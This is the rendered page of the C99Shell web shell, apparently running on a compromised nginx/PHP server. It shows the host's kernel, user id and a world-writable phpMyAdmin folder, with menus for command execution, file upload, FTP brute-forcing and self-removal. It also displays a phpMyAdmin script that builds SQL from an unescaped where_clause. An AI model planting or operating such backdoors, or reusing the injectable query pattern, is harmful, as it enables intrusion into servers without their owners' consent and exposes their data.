!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/phpMY/   drwxrwxrwx
Free 83.36 GB of 96.73 GB (86.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     tbl_get_field.php (1.12 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Provides download to a given field defined in parameters.
 * @package PhpMyAdmin
 */

/**
 * Common functions.
 */
require_once './libraries/common.inc.php';
require_once 
'./libraries/mime.lib.php';

/* Check parameters */
PMA_checkParameters(array('db''table''where_clause''transform_key'));

/* Select database */
if (!PMA_DBI_select_db($db)) {
    
PMA_mysqlDie(sprintf(__('\'%s\' database does not exist.'), htmlspecialchars($db)),
        
'''');
}

/* Check if table exists */
if (!PMA_DBI_get_columns($db$table)) {
    
PMA_mysqlDie(__('Invalid table name'));
}

/* Grab data */
$sql 'SELECT ' PMA_backquote($transform_key) . ' FROM ' PMA_backquote($table) . ' WHERE ' $where_clause ';';
$result PMA_DBI_fetch_value($sql);

/* Check return code */
if ($result === false) {
    
PMA_mysqlDie(__('MySQL returned an empty result set (i.e. zero rows).'), $sql);
}

/* Avoid corrupting data */
@ini_set('url_rewriter.tags''');

PMA_download_header(
    
$table '-' .  $transform_key '.bin',
    
PMA_detectMIME($result),
    
strlen($result)
    );
echo 
$result;
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0029 ]--